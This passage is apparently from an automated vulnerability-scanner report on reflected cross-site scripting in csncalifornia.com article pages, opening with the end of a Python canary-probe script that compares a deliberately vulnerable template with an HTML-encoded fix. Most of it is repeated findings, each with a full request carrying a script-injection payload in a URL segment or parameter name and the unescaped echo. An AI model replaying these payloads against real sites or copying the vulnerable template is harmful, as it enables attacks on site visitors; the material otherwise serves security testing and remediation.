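    """Carry the canary in a query-parameter *name* (the report's 'arbitrarily supplied request parameter')."""
    return f"{path}?{canary}=1"


def _split_request(request_uri: str):
    path, _, query = request_uri.partition("?")
    names = [p.split("=", 1)[0] for p in query.split("&") if p]
    return path, names


def render_page_vulnerable(request_uri: str) -> str:
    """Assumed vulnerable template: raw path into <form action>, raw parameter
    names into hidden inputs, exactly the pattern the report's responses show."""
    path, names = _split_request(request_uri)
    hidden = "".join(f'<input type=hidden name="{n}" id = "{n}">' for n in names)
    return f"<form ID='formInvisible' action=\"{path}\">{hidden}</form>"


def render_page_fixed(request_uri: str) -> str:
    """Same template with every untrusted value HTML-attribute-encoded at the output point."""
    path, names = _split_request(request_uri)
    enc = lambda s: html.escape(s, quote=True)  # encodes " ' < > & so the attribute cannot be closed early
    hidden = "".join(f'<input type=hidden name="{enc(n)}" id="{enc(n)}">' for n in names)
    return f"<form ID='formInvisible' action=\"{enc(path)}\">{hidden}</form>"


def classify_reflection(body: str, canary: str) -> str:
    """How the canary came back:
    'attribute-breakout' - raw, inside a double-quoted attribute value (its leading '">' closes the tag)
    'reflected'          - raw, but in some other context (needs its own review)
    'encoded'            - present only in HTML-escaped form (the sink is safe)
    'absent'             - not reflected at all
    """
    in_attr = r'<[A-Za-z][^>]*\s[\w-]+\s*=\s*"[^"]*' + re.escape(canary)
    if re.search(in_attr, body):
        return "attribute-breakout"
    if canary in body:
        return "reflected"
    if html.escape(canary, quote=True) in body:
        return "encoded"
    return "absent"


def run_checks(canary: str = "") -> dict:
    """Probe both sinks against the vulnerable and the fixed renderer."""
    canary = canary or make_canary()
    probes = {
        "rest-param-1": inject_path_segment(ARTICLE_PATH, 1, canary),
        "rest-param-4": inject_path_segment(ARTICLE_PATH, 4, canary),
        "param-name": inject_param_name(ARTICLE_PATH, canary),
    }
    return {
        f"{label}/{variant}": classify_reflection(render(uri), canary)
        for label, uri in probes.items()
        for variant, render in (("vulnerable", render_page_vulnerable), ("fixed", render_page_fixed))
    }


if __name__ == "__main__":
    for probe, verdict in run_checks().items():
        print(f"{probe:24} {verdict}")
```

Two caveats when replaying this against a live target. The scanner's probes carry a literal `"` and `<` in the request line, as every request above shows; the older percent-encoded payload left in the crawled URL of the csnbayarea.com finding (`%22%3E%3Cscript%3E...`) is echoed still encoded in the action attribute and so never breaks out, which is why only the literal-quote probe registers. Segment numbering also counts decoded segments: that same crawled URL contains `%3C/script%3E`, which decodes to a slash, so the Urban-Renterias segment is reported as REST URL parameter 5 rather than 4. A probe that comes back `encoded` after a fix is the evidence that the attribute is safe; `reflected` means the value reached the page somewhere else and that context needs its own check.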

2.242. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2e20"><script>alert(1)</script>337775cf04b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12c2e20"><script>alert(1)</script>337775cf04b/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12c2e20"><script>alert(1)</script>337775cf04b/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html">
...[SNIP]...

2.243. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d81e"><script>alert(1)</script>1ea0c328bf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/071d81e"><script>alert(1)</script>1ea0c328bf5/10/Text-to-Win-a-Flip-Sweepstakes/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/071d81e"><script>alert(1)</script>1ea0c328bf5/10/Text-to-Win-a-Flip-Sweepstakes/landing.html">
...[SNIP]...

2.244. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22d00"><script>alert(1)</script>3b9a8daff6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/07/1022d00"><script>alert(1)</script>3b9a8daff6a/Text-to-Win-a-Flip-Sweepstakes/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51718

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/07/1022d00"><script>alert(1)</script>3b9a8daff6a/Text-to-Win-a-Flip-Sweepstakes/landing.html">
...[SNIP]...

2.245. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 783a8"><script>alert(1)</script>753733aaae1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/07/10/Text-to-Win-a-Flip-Sweepstakes783a8"><script>alert(1)</script>753733aaae1/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/07/10/Text-to-Win-a-Flip-Sweepstakes783a8"><script>alert(1)</script>753733aaae1/landing.html">
...[SNIP]...

2.246. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 696bb"><script>alert(1)</script>0b37ba3c0d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html?696bb"><script>alert(1)</script>0b37ba3c0d4=1 HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51552

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="696bb"><script>alert(1)</script>0b37ba3c0d4" id = "696bb">
...[SNIP]...

2.247. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85497"><script>alert(1)</script>d032dfcbdb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1285497"><script>alert(1)</script>d032dfcbdb4/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/1285497"><script>alert(1)</script>d032dfcbdb4/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html">
...[SNIP]...

2.248. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a641b"><script>alert(1)</script>b77f2c3bf5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/15a641b"><script>alert(1)</script>b77f2c3bf5a/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/15a641b"><script>alert(1)</script>b77f2c3bf5a/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html">
...[SNIP]...

2.249. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40ea7"><script>alert(1)</script>f3511ff7f64 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/15/1040ea7"><script>alert(1)</script>f3511ff7f64/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/15/1040ea7"><script>alert(1)</script>f3511ff7f64/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html">
...[SNIP]...

2.250. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e36ea"><script>alert(1)</script>b1b0878059d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/15/10/Report-Aubrey-Huff-wore-rhinestone-encrue36ea"><script>alert(1)</script>b1b0878059d/landing_word_streets.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encrue36ea"><script>alert(1)</script>b1b0878059d/landing_word_streets.html">
...[SNIP]...

2.251. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81447"><script>alert(1)</script>a1306ad1405 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1281447"><script>alert(1)</script>a1306ad1405/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55333

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/1281447"><script>alert(1)</script>a1306ad1405/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html">
...[SNIP]...

2.252. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 602af"><script>alert(1)</script>146ab9d7a83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/15602af"><script>alert(1)</script>146ab9d7a83/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55314

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/15602af"><script>alert(1)</script>146ab9d7a83/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html">
...[SNIP]...

2.253. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45c0e"><script>alert(1)</script>36e3d581f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/15/1045c0e"><script>alert(1)</script>36e3d581f3/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55328

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/15/1045c0e"><script>alert(1)</script>36e3d581f3/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html">
...[SNIP]...

2.254. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9913"><script>alert(1)</script>a067ea4d937 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/15/10/Warriors-Lin-likely-headed-to-D-Leagueb9913"><script>alert(1)</script>a067ea4d937/landing_warriors.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55333

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/15/10/Warriors-Lin-likely-headed-to-D-Leagueb9913"><script>alert(1)</script>a067ea4d937/landing_warriors.html">
...[SNIP]...

2.255. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a52"><script>alert(1)</script>9406270512a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html?36a52"><script>alert(1)</script>9406270512a=1 HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55296

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="36a52"><script>alert(1)</script>9406270512a" id = "36a52">
...[SNIP]...

2.256. http://www.csncalifornia.com/12/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70697"><script>alert(1)</script>1804d5ee4fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1270697"><script>alert(1)</script>1804d5ee4fd/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
